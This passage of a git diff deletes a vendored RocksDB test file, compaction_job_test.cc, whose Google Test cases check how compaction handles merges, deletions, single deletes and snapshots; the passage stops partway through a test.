-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED, not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
-
-#else
-
-int main(int argc, char** argv) { return 0; }
-#endif  // !defined(IOS_CROSS_COMPILE)
diff --git a/thirdparty/rocksdb/db/compaction_job_test.cc b/thirdparty/rocksdb/db/compaction_job_test.cc
deleted file mode 100644
index cace181..0000000
--- a/thirdparty/rocksdb/db/compaction_job_test.cc
+++ /dev/null
@@ -1,949 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <algorithm>
-#include <map>
-#include <string>
-#include <tuple>
-
-#include "db/column_family.h"
-#include "db/compaction_job.h"
-#include "db/version_set.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/mock_table.h"
-#include "util/file_reader_writer.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-namespace {
-
-void VerifyInitializationOfCompactionJobStats(
-      const CompactionJobStats& compaction_job_stats) {
-#if !defined(IOS_CROSS_COMPILE)
-  ASSERT_EQ(compaction_job_stats.elapsed_micros, 0U);
-
-  ASSERT_EQ(compaction_job_stats.num_input_records, 0U);
-  ASSERT_EQ(compaction_job_stats.num_input_files, 0U);
-  ASSERT_EQ(compaction_job_stats.num_input_files_at_output_level, 0U);
-
-  ASSERT_EQ(compaction_job_stats.num_output_records, 0U);
-  ASSERT_EQ(compaction_job_stats.num_output_files, 0U);
-
-  ASSERT_EQ(compaction_job_stats.is_manual_compaction, true);
-
-  ASSERT_EQ(compaction_job_stats.total_input_bytes, 0U);
-  ASSERT_EQ(compaction_job_stats.total_output_bytes, 0U);
-
-  ASSERT_EQ(compaction_job_stats.total_input_raw_key_bytes, 0U);
-  ASSERT_EQ(compaction_job_stats.total_input_raw_value_bytes, 0U);
-
-  ASSERT_EQ(compaction_job_stats.smallest_output_key_prefix[0], 0);
-  ASSERT_EQ(compaction_job_stats.largest_output_key_prefix[0], 0);
-
-  ASSERT_EQ(compaction_job_stats.num_records_replaced, 0U);
-
-  ASSERT_EQ(compaction_job_stats.num_input_deletion_records, 0U);
-  ASSERT_EQ(compaction_job_stats.num_expired_deletion_records, 0U);
-
-  ASSERT_EQ(compaction_job_stats.num_corrupt_keys, 0U);
-#endif  // !defined(IOS_CROSS_COMPILE)
-}
-
-}  // namespace
-
-// TODO(icanadi) Make it simpler once we mock out VersionSet
-class CompactionJobTest : public testing::Test {
- public:
-  CompactionJobTest()
-      : env_(Env::Default()),
-        dbname_(test::TmpDir() + "/compaction_job_test"),
-        db_options_(),
-        mutable_cf_options_(cf_options_),
-        table_cache_(NewLRUCache(50000, 16)),
-        write_buffer_manager_(db_options_.db_write_buffer_size),
-        versions_(new VersionSet(dbname_, &db_options_, env_options_,
-                                 table_cache_.get(), &write_buffer_manager_,
-                                 &write_controller_)),
-        shutting_down_(false),
-        mock_table_factory_(new mock::MockTableFactory()) {
-    EXPECT_OK(env_->CreateDirIfMissing(dbname_));
-    db_options_.db_paths.emplace_back(dbname_,
-                                      std::numeric_limits<uint64_t>::max());
-  }
-
-  std::string GenerateFileName(uint64_t file_number) {
-    FileMetaData meta;
-    std::vector<DbPath> db_paths;
-    db_paths.emplace_back(dbname_, std::numeric_limits<uint64_t>::max());
-    meta.fd = FileDescriptor(file_number, 0, 0);
-    return TableFileName(db_paths, meta.fd.GetNumber(), meta.fd.GetPathId());
-  }
-
-  std::string KeyStr(const std::string& user_key, const SequenceNumber seq_num,
-      const ValueType t) {
-    return InternalKey(user_key, seq_num, t).Encode().ToString();
-  }
-
-  void AddMockFile(const stl_wrappers::KVMap& contents, int level = 0) {
-    assert(contents.size() > 0);
-
-    bool first_key = true;
-    std::string smallest, largest;
-    InternalKey smallest_key, largest_key;
-    SequenceNumber smallest_seqno = kMaxSequenceNumber;
-    SequenceNumber largest_seqno = 0;
-    for (auto kv : contents) {
-      ParsedInternalKey key;
-      std::string skey;
-      std::string value;
-      std::tie(skey, value) = kv;
-      ParseInternalKey(skey, &key);
-
-      smallest_seqno = std::min(smallest_seqno, key.sequence);
-      largest_seqno = std::max(largest_seqno, key.sequence);
-
-      if (first_key ||
-          cfd_->user_comparator()->Compare(key.user_key, smallest) < 0) {
-        smallest.assign(key.user_key.data(), key.user_key.size());
-        smallest_key.DecodeFrom(skey);
-      }
-      if (first_key ||
-          cfd_->user_comparator()->Compare(key.user_key, largest) > 0) {
-        largest.assign(key.user_key.data(), key.user_key.size());
-        largest_key.DecodeFrom(skey);
-      }
-
-      first_key = false;
-    }
-
-    uint64_t file_number = versions_->NewFileNumber();
-    EXPECT_OK(mock_table_factory_->CreateMockTable(
-        env_, GenerateFileName(file_number), std::move(contents)));
-
-    VersionEdit edit;
-    edit.AddFile(level, file_number, 0, 10, smallest_key, largest_key,
-        smallest_seqno, largest_seqno, false);
-
-    mutex_.Lock();
-    versions_->LogAndApply(versions_->GetColumnFamilySet()->GetDefault(),
-                           mutable_cf_options_, &edit, &mutex_);
-    mutex_.Unlock();
-  }
-
-  void SetLastSequence(const SequenceNumber sequence_number) {
-    versions_->SetLastToBeWrittenSequence(sequence_number + 1);
-    versions_->SetLastSequence(sequence_number + 1);
-  }
-
-  // returns expected result after compaction
-  stl_wrappers::KVMap CreateTwoFiles(bool gen_corrupted_keys) {
-    auto expected_results = mock::MakeMockFile();
-    const int kKeysPerFile = 10000;
-    const int kCorruptKeysPerFile = 200;
-    const int kMatchingKeys = kKeysPerFile / 2;
-    SequenceNumber sequence_number = 0;
-
-    auto corrupt_id = [&](int id) {
-      return gen_corrupted_keys && id > 0 && id <= kCorruptKeysPerFile;
-    };
-
-    for (int i = 0; i < 2; ++i) {
-      auto contents = mock::MakeMockFile();
-      for (int k = 0; k < kKeysPerFile; ++k) {
-        auto key = ToString(i * kMatchingKeys + k);
-        auto value = ToString(i * kKeysPerFile + k);
-        InternalKey internal_key(key, ++sequence_number, kTypeValue);
-
-        // This is how the key will look like once it's written in bottommost
-        // file
-        InternalKey bottommost_internal_key(
-            key, (key == "9999") ? sequence_number : 0, kTypeValue);
-
-        if (corrupt_id(k)) {
-          test::CorruptKeyType(&internal_key);
-          test::CorruptKeyType(&bottommost_internal_key);
-        }
-        contents.insert({ internal_key.Encode().ToString(), value });
-        if (i == 1 || k < kMatchingKeys || corrupt_id(k - kMatchingKeys)) {
-          expected_results.insert(
-              { bottommost_internal_key.Encode().ToString(), value });
-        }
-      }
-
-      AddMockFile(contents);
-    }
-
-    SetLastSequence(sequence_number);
-
-    return expected_results;
-  }
-
-  void NewDB() {
-    VersionEdit new_db;
-    new_db.SetLogNumber(0);
-    new_db.SetNextFile(2);
-    new_db.SetLastSequence(0);
-
-    const std::string manifest = DescriptorFileName(dbname_, 1);
-    unique_ptr<WritableFile> file;
-    Status s = env_->NewWritableFile(
-        manifest, &file, env_->OptimizeForManifestWrite(env_options_));
-    ASSERT_OK(s);
-    unique_ptr<WritableFileWriter> file_writer(
-        new WritableFileWriter(std::move(file), env_options_));
-    {
-      log::Writer log(std::move(file_writer), 0, false);
-      std::string record;
-      new_db.EncodeTo(&record);
-      s = log.AddRecord(record);
-    }
-    ASSERT_OK(s);
-    // Make "CURRENT" file that points to the new manifest file.
-    s = SetCurrentFile(env_, dbname_, 1, nullptr);
-
-    std::vector<ColumnFamilyDescriptor> column_families;
-    cf_options_.table_factory = mock_table_factory_;
-    cf_options_.merge_operator = merge_op_;
-    cf_options_.compaction_filter = compaction_filter_.get();
-    column_families.emplace_back(kDefaultColumnFamilyName, cf_options_);
-
-    EXPECT_OK(versions_->Recover(column_families, false));
-    cfd_ = versions_->GetColumnFamilySet()->GetDefault();
-  }
-
-  void RunCompaction(
-      const std::vector<std::vector<FileMetaData*>>& input_files,
-      const stl_wrappers::KVMap& expected_results,
-      const std::vector<SequenceNumber>& snapshots = {},
-      SequenceNumber earliest_write_conflict_snapshot = kMaxSequenceNumber) {
-    auto cfd = versions_->GetColumnFamilySet()->GetDefault();
-
-    size_t num_input_files = 0;
-    std::vector<CompactionInputFiles> compaction_input_files;
-    for (size_t level = 0; level < input_files.size(); level++) {
-      auto level_files = input_files[level];
-      CompactionInputFiles compaction_level;
-      compaction_level.level = static_cast<int>(level);
-      compaction_level.files.insert(compaction_level.files.end(),
-          level_files.begin(), level_files.end());
-      compaction_input_files.push_back(compaction_level);
-      num_input_files += level_files.size();
-    }
-
-    Compaction compaction(cfd->current()->storage_info(), *cfd->ioptions(),
-                          *cfd->GetLatestMutableCFOptions(),
-                          compaction_input_files, 1, 1024 * 1024,
-                          10 * 1024 * 1024, 0, kNoCompression, {}, true);
-    compaction.SetInputVersion(cfd->current());
-
-    LogBuffer log_buffer(InfoLogLevel::INFO_LEVEL, db_options_.info_log.get());
-    mutex_.Lock();
-    EventLogger event_logger(db_options_.info_log.get());
-    CompactionJob compaction_job(
-        0, &compaction, db_options_, env_options_, versions_.get(),
-        &shutting_down_, &log_buffer, nullptr, nullptr, nullptr, &mutex_,
-        &bg_error_, snapshots, earliest_write_conflict_snapshot, table_cache_,
-        &event_logger, false, false, dbname_, &compaction_job_stats_);
-
-    VerifyInitializationOfCompactionJobStats(compaction_job_stats_);
-
-    compaction_job.Prepare();
-    mutex_.Unlock();
-    Status s;
-    s = compaction_job.Run();
-    ASSERT_OK(s);
-    mutex_.Lock();
-    ASSERT_OK(compaction_job.Install(*cfd->GetLatestMutableCFOptions()));
-    mutex_.Unlock();
-
-    if (expected_results.size() == 0) {
-      ASSERT_GE(compaction_job_stats_.elapsed_micros, 0U);
-      ASSERT_EQ(compaction_job_stats_.num_input_files, num_input_files);
-      ASSERT_EQ(compaction_job_stats_.num_output_files, 0U);
-    } else {
-      ASSERT_GE(compaction_job_stats_.elapsed_micros, 0U);
-      ASSERT_EQ(compaction_job_stats_.num_input_files, num_input_files);
-      ASSERT_EQ(compaction_job_stats_.num_output_files, 1U);
-      mock_table_factory_->AssertLatestFile(expected_results);
-    }
-  }
-
-  Env* env_;
-  std::string dbname_;
-  EnvOptions env_options_;
-  ImmutableDBOptions db_options_;
-  ColumnFamilyOptions cf_options_;
-  MutableCFOptions mutable_cf_options_;
-  std::shared_ptr<Cache> table_cache_;
-  WriteController write_controller_;
-  WriteBufferManager write_buffer_manager_;
-  std::unique_ptr<VersionSet> versions_;
-  InstrumentedMutex mutex_;
-  std::atomic<bool> shutting_down_;
-  std::shared_ptr<mock::MockTableFactory> mock_table_factory_;
-  CompactionJobStats compaction_job_stats_;
-  ColumnFamilyData* cfd_;
-  std::unique_ptr<CompactionFilter> compaction_filter_;
-  std::shared_ptr<MergeOperator> merge_op_;
-  Status bg_error_;
-};
-
-TEST_F(CompactionJobTest, Simple) {
-  NewDB();
-
-  auto expected_results = CreateTwoFiles(false);
-  auto cfd = versions_->GetColumnFamilySet()->GetDefault();
-  auto files = cfd->current()->storage_info()->LevelFiles(0);
-  ASSERT_EQ(2U, files.size());
-  RunCompaction({ files }, expected_results);
-}
-
-TEST_F(CompactionJobTest, SimpleCorrupted) {
-  NewDB();
-
-  auto expected_results = CreateTwoFiles(true);
-  auto cfd = versions_->GetColumnFamilySet()->GetDefault();
-  auto files = cfd->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-  ASSERT_EQ(compaction_job_stats_.num_corrupt_keys, 400U);
-}
-
-TEST_F(CompactionJobTest, SimpleDeletion) {
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({{KeyStr("c", 4U, kTypeDeletion), ""},
-                                   {KeyStr("c", 3U, kTypeValue), "val"}});
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({{KeyStr("b", 2U, kTypeValue), "val"},
-                                   {KeyStr("b", 1U, kTypeValue), "val"}});
-  AddMockFile(file2);
-
-  auto expected_results =
-      mock::MakeMockFile({{KeyStr("b", 0U, kTypeValue), "val"}});
-
-  SetLastSequence(4U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-}
-
-TEST_F(CompactionJobTest, OutputNothing) {
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({{KeyStr("a", 1U, kTypeValue), "val"}});
-
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({{KeyStr("a", 2U, kTypeDeletion), ""}});
-
-  AddMockFile(file2);
-
-  auto expected_results = mock::MakeMockFile();
-
-  SetLastSequence(4U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-}
-
-TEST_F(CompactionJobTest, SimpleOverwrite) {
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({
-      {KeyStr("a", 3U, kTypeValue), "val2"},
-      {KeyStr("b", 4U, kTypeValue), "val3"},
-  });
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({{KeyStr("a", 1U, kTypeValue), "val"},
-                                   {KeyStr("b", 2U, kTypeValue), "val"}});
-  AddMockFile(file2);
-
-  auto expected_results =
-      mock::MakeMockFile({{KeyStr("a", 0U, kTypeValue), "val2"},
-                          {KeyStr("b", 4U, kTypeValue), "val3"}});
-
-  SetLastSequence(4U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-}
-
-TEST_F(CompactionJobTest, SimpleNonLastLevel) {
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({
-      {KeyStr("a", 5U, kTypeValue), "val2"},
-      {KeyStr("b", 6U, kTypeValue), "val3"},
-  });
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({{KeyStr("a", 3U, kTypeValue), "val"},
-                                   {KeyStr("b", 4U, kTypeValue), "val"}});
-  AddMockFile(file2, 1);
-
-  auto file3 = mock::MakeMockFile({{KeyStr("a", 1U, kTypeValue), "val"},
-                                   {KeyStr("b", 2U, kTypeValue), "val"}});
-  AddMockFile(file3, 2);
-
-  // Because level 1 is not the last level, the sequence numbers of a and b
-  // cannot be set to 0
-  auto expected_results =
-      mock::MakeMockFile({{KeyStr("a", 5U, kTypeValue), "val2"},
-                          {KeyStr("b", 6U, kTypeValue), "val3"}});
-
-  SetLastSequence(6U);
-  auto lvl0_files = cfd_->current()->storage_info()->LevelFiles(0);
-  auto lvl1_files = cfd_->current()->storage_info()->LevelFiles(1);
-  RunCompaction({lvl0_files, lvl1_files}, expected_results);
-}
-
-TEST_F(CompactionJobTest, SimpleMerge) {
-  merge_op_ = MergeOperators::CreateStringAppendOperator();
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({
-      {KeyStr("a", 5U, kTypeMerge), "5"},
-      {KeyStr("a", 4U, kTypeMerge), "4"},
-      {KeyStr("a", 3U, kTypeValue), "3"},
-  });
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile(
-      {{KeyStr("b", 2U, kTypeMerge), "2"}, {KeyStr("b", 1U, kTypeValue), "1"}});
-  AddMockFile(file2);
-
-  auto expected_results =
-      mock::MakeMockFile({{KeyStr("a", 0U, kTypeValue), "3,4,5"},
-                          {KeyStr("b", 2U, kTypeValue), "1,2"}});
-
-  SetLastSequence(5U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-}
-
-TEST_F(CompactionJobTest, NonAssocMerge) {
-  merge_op_ = MergeOperators::CreateStringAppendTESTOperator();
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({
-      {KeyStr("a", 5U, kTypeMerge), "5"},
-      {KeyStr("a", 4U, kTypeMerge), "4"},
-      {KeyStr("a", 3U, kTypeMerge), "3"},
-  });
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile(
-      {{KeyStr("b", 2U, kTypeMerge), "2"}, {KeyStr("b", 1U, kTypeMerge), "1"}});
-  AddMockFile(file2);
-
-  auto expected_results =
-      mock::MakeMockFile({{KeyStr("a", 0U, kTypeValue), "3,4,5"},
-                          {KeyStr("b", 2U, kTypeMerge), "2"},
-                          {KeyStr("b", 1U, kTypeMerge), "1"}});
-
-  SetLastSequence(5U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-}
-
-// Filters merge operands with value 10.
-TEST_F(CompactionJobTest, MergeOperandFilter) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-  compaction_filter_.reset(new test::FilterNumber(10U));
-  NewDB();
-
-  auto file1 = mock::MakeMockFile(
-      {{KeyStr("a", 5U, kTypeMerge), test::EncodeInt(5U)},
-       {KeyStr("a", 4U, kTypeMerge), test::EncodeInt(10U)},  // Filtered
-       {KeyStr("a", 3U, kTypeMerge), test::EncodeInt(3U)}});
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({
-      {KeyStr("b", 2U, kTypeMerge), test::EncodeInt(2U)},
-      {KeyStr("b", 1U, kTypeMerge), test::EncodeInt(10U)}  // Filtered
-  });
-  AddMockFile(file2);
-
-  auto expected_results =
-      mock::MakeMockFile({{KeyStr("a", 0U, kTypeValue), test::EncodeInt(8U)},
-                          {KeyStr("b", 2U, kTypeMerge), test::EncodeInt(2U)}});
-
-  SetLastSequence(5U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-}
-
-TEST_F(CompactionJobTest, FilterSomeMergeOperands) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-  compaction_filter_.reset(new test::FilterNumber(10U));
-  NewDB();
-
-  auto file1 = mock::MakeMockFile(
-      {{KeyStr("a", 5U, kTypeMerge), test::EncodeInt(5U)},
-       {KeyStr("a", 4U, kTypeMerge), test::EncodeInt(10U)},  // Filtered
-       {KeyStr("a", 3U, kTypeValue), test::EncodeInt(5U)},
-       {KeyStr("d", 8U, kTypeMerge), test::EncodeInt(10U)}});
-  AddMockFile(file1);
-
-  auto file2 =
-      mock::MakeMockFile({{KeyStr("b", 2U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("b", 1U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("c", 2U, kTypeMerge), test::EncodeInt(3U)},
-                          {KeyStr("c", 1U, kTypeValue), test::EncodeInt(7U)},
-                          {KeyStr("d", 1U, kTypeValue), test::EncodeInt(6U)}});
-  AddMockFile(file2);
-
-  auto file3 =
-      mock::MakeMockFile({{KeyStr("a", 1U, kTypeMerge), test::EncodeInt(3U)}});
-  AddMockFile(file3, 2);
-
-  auto expected_results = mock::MakeMockFile({
-      {KeyStr("a", 5U, kTypeValue), test::EncodeInt(10U)},
-      {KeyStr("c", 2U, kTypeValue), test::EncodeInt(10U)},
-      {KeyStr("d", 1U, kTypeValue), test::EncodeInt(6U)}
-      // b does not appear because the operands are filtered
-  });
-
-  SetLastSequence(5U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-}
-
-// Test where all operands/merge results are filtered out.
-TEST_F(CompactionJobTest, FilterAllMergeOperands) {
-  merge_op_ = MergeOperators::CreateUInt64AddOperator();
-  compaction_filter_.reset(new test::FilterNumber(10U));
-  NewDB();
-
-  auto file1 =
-      mock::MakeMockFile({{KeyStr("a", 11U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("a", 10U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("a", 9U, kTypeMerge), test::EncodeInt(10U)}});
-  AddMockFile(file1);
-
-  auto file2 =
-      mock::MakeMockFile({{KeyStr("b", 8U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("b", 7U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("b", 6U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("b", 5U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("b", 4U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("b", 3U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("b", 2U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("c", 2U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("c", 1U, kTypeMerge), test::EncodeInt(10U)}});
-  AddMockFile(file2);
-
-  auto file3 =
-      mock::MakeMockFile({{KeyStr("a", 2U, kTypeMerge), test::EncodeInt(10U)},
-                          {KeyStr("b", 1U, kTypeMerge), test::EncodeInt(10U)}});
-  AddMockFile(file3, 2);
-
-  SetLastSequence(11U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-
-  stl_wrappers::KVMap empty_map;
-  RunCompaction({files}, empty_map);
-}
-
-TEST_F(CompactionJobTest, SimpleSingleDelete) {
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({
-      {KeyStr("a", 5U, kTypeDeletion), ""},
-      {KeyStr("b", 6U, kTypeSingleDeletion), ""},
-  });
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({{KeyStr("a", 3U, kTypeValue), "val"},
-                                   {KeyStr("b", 4U, kTypeValue), "val"}});
-  AddMockFile(file2);
-
-  auto file3 = mock::MakeMockFile({
-      {KeyStr("a", 1U, kTypeValue), "val"},
-  });
-  AddMockFile(file3, 2);
-
-  auto expected_results =
-      mock::MakeMockFile({{KeyStr("a", 5U, kTypeDeletion), ""}});
-
-  SetLastSequence(6U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-}
-
-TEST_F(CompactionJobTest, SingleDeleteSnapshots) {
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({
-      {KeyStr("A", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("a", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("b", 21U, kTypeSingleDeletion), ""},
-      {KeyStr("c", 22U, kTypeSingleDeletion), ""},
-      {KeyStr("d", 9U, kTypeSingleDeletion), ""},
-      {KeyStr("f", 21U, kTypeSingleDeletion), ""},
-      {KeyStr("j", 11U, kTypeSingleDeletion), ""},
-      {KeyStr("j", 9U, kTypeSingleDeletion), ""},
-      {KeyStr("k", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("k", 11U, kTypeSingleDeletion), ""},
-      {KeyStr("l", 3U, kTypeSingleDeletion), ""},
-      {KeyStr("l", 2U, kTypeSingleDeletion), ""},
-  });
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({
-      {KeyStr("0", 2U, kTypeSingleDeletion), ""},
-      {KeyStr("a", 11U, kTypeValue), "val1"},
-      {KeyStr("b", 11U, kTypeValue), "val2"},
-      {KeyStr("c", 21U, kTypeValue), "val3"},
-      {KeyStr("d", 8U, kTypeValue), "val4"},
-      {KeyStr("e", 2U, kTypeSingleDeletion), ""},
-      {KeyStr("f", 1U, kTypeValue), "val1"},
-      {KeyStr("g", 11U, kTypeSingleDeletion), ""},
-      {KeyStr("h", 2U, kTypeSingleDeletion), ""},
-      {KeyStr("m", 12U, kTypeValue), "val1"},
-      {KeyStr("m", 11U, kTypeSingleDeletion), ""},
-      {KeyStr("m", 8U, kTypeValue), "val2"},
-  });
-  AddMockFile(file2);
-
-  auto file3 = mock::MakeMockFile({
-      {KeyStr("A", 1U, kTypeValue), "val"},
-      {KeyStr("e", 1U, kTypeValue), "val"},
-  });
-  AddMockFile(file3, 2);
-
-  auto expected_results = mock::MakeMockFile({
-      {KeyStr("A", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("a", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("a", 11U, kTypeValue), ""},
-      {KeyStr("b", 21U, kTypeSingleDeletion), ""},
-      {KeyStr("b", 11U, kTypeValue), "val2"},
-      {KeyStr("c", 22U, kTypeSingleDeletion), ""},
-      {KeyStr("c", 21U, kTypeValue), ""},
-      {KeyStr("e", 2U, kTypeSingleDeletion), ""},
-      {KeyStr("f", 21U, kTypeSingleDeletion), ""},
-      {KeyStr("f", 1U, kTypeValue), "val1"},
-      {KeyStr("g", 11U, kTypeSingleDeletion), ""},
-      {KeyStr("j", 11U, kTypeSingleDeletion), ""},
-      {KeyStr("k", 11U, kTypeSingleDeletion), ""},
-      {KeyStr("m", 12U, kTypeValue), "val1"},
-      {KeyStr("m", 11U, kTypeSingleDeletion), ""},
-      {KeyStr("m", 8U, kTypeValue), "val2"},
-  });
-
-  SetLastSequence(22U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results, {10U, 20U}, 10U);
-}
-
-TEST_F(CompactionJobTest, EarliestWriteConflictSnapshot) {
-  NewDB();
-
-  // Test multiple snapshots where the earliest snapshot is not a
-  // write-conflic-snapshot.
-
-  auto file1 = mock::MakeMockFile({
-      {KeyStr("A", 24U, kTypeSingleDeletion), ""},
-      {KeyStr("A", 23U, kTypeValue), "val"},
-      {KeyStr("B", 24U, kTypeSingleDeletion), ""},
-      {KeyStr("B", 23U, kTypeValue), "val"},
-      {KeyStr("D", 24U, kTypeSingleDeletion), ""},
-      {KeyStr("G", 32U, kTypeSingleDeletion), ""},
-      {KeyStr("G", 31U, kTypeValue), "val"},
-      {KeyStr("G", 24U, kTypeSingleDeletion), ""},
-      {KeyStr("G", 23U, kTypeValue), "val2"},
-      {KeyStr("H", 31U, kTypeValue), "val"},
-      {KeyStr("H", 24U, kTypeSingleDeletion), ""},
-      {KeyStr("H", 23U, kTypeValue), "val"},
-      {KeyStr("I", 35U, kTypeSingleDeletion), ""},
-      {KeyStr("I", 34U, kTypeValue), "val2"},
-      {KeyStr("I", 33U, kTypeSingleDeletion), ""},
-      {KeyStr("I", 32U, kTypeValue), "val3"},
-      {KeyStr("I", 31U, kTypeSingleDeletion), ""},
-      {KeyStr("J", 34U, kTypeValue), "val"},
-      {KeyStr("J", 33U, kTypeSingleDeletion), ""},
-      {KeyStr("J", 25U, kTypeValue), "val2"},
-      {KeyStr("J", 24U, kTypeSingleDeletion), ""},
-  });
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({
-      {KeyStr("A", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("A", 13U, kTypeValue), "val2"},
-      {KeyStr("C", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("C", 13U, kTypeValue), "val"},
-      {KeyStr("E", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("F", 4U, kTypeSingleDeletion), ""},
-      {KeyStr("F", 3U, kTypeValue), "val"},
-      {KeyStr("G", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("G", 13U, kTypeValue), "val3"},
-      {KeyStr("H", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("H", 13U, kTypeValue), "val2"},
-      {KeyStr("I", 13U, kTypeValue), "val4"},
-      {KeyStr("I", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("I", 11U, kTypeValue), "val5"},
-      {KeyStr("J", 15U, kTypeValue), "val3"},
-      {KeyStr("J", 14U, kTypeSingleDeletion), ""},
-  });
-  AddMockFile(file2);
-
-  auto expected_results = mock::MakeMockFile({
-      {KeyStr("A", 24U, kTypeSingleDeletion), ""},
-      {KeyStr("A", 23U, kTypeValue), ""},
-      {KeyStr("B", 24U, kTypeSingleDeletion), ""},
-      {KeyStr("B", 23U, kTypeValue), ""},
-      {KeyStr("D", 24U, kTypeSingleDeletion), ""},
-      {KeyStr("E", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("G", 32U, kTypeSingleDeletion), ""},
-      {KeyStr("G", 31U, kTypeValue), ""},
-      {KeyStr("H", 31U, kTypeValue), "val"},
-      {KeyStr("I", 35U, kTypeSingleDeletion), ""},
-      {KeyStr("I", 34U, kTypeValue), ""},
-      {KeyStr("I", 31U, kTypeSingleDeletion), ""},
-      {KeyStr("I", 13U, kTypeValue), "val4"},
-      {KeyStr("J", 34U, kTypeValue), "val"},
-      {KeyStr("J", 33U, kTypeSingleDeletion), ""},
-      {KeyStr("J", 25U, kTypeValue), "val2"},
-      {KeyStr("J", 24U, kTypeSingleDeletion), ""},
-      {KeyStr("J", 15U, kTypeValue), "val3"},
-      {KeyStr("J", 14U, kTypeSingleDeletion), ""},
-  });
-
-  SetLastSequence(24U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results, {10U, 20U, 30U}, 20U);
-}
-
-TEST_F(CompactionJobTest, SingleDeleteZeroSeq) {
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({
-      {KeyStr("A", 10U, kTypeSingleDeletion), ""},
-      {KeyStr("dummy", 5U, kTypeValue), "val2"},
-  });
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({
-      {KeyStr("A", 0U, kTypeValue), "val"},
-  });
-  AddMockFile(file2);
-
-  auto expected_results = mock::MakeMockFile({
-      {KeyStr("dummy", 5U, kTypeValue), "val2"},
-  });
-
-  SetLastSequence(22U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results, {});
-}
-
-TEST_F(CompactionJobTest, MultiSingleDelete) {
-  // Tests three scenarios involving multiple single delete/put pairs:
-  //
-  // A: Put Snapshot SDel Put SDel -> Put Snapshot SDel
-  // B: Snapshot Put SDel Put SDel Snapshot -> Snapshot SDel Snapshot
-  // C: SDel Put SDel Snapshot Put -> Snapshot Put
-  // D: (Put) SDel Snapshot Put SDel -> (Put) SDel Snapshot SDel
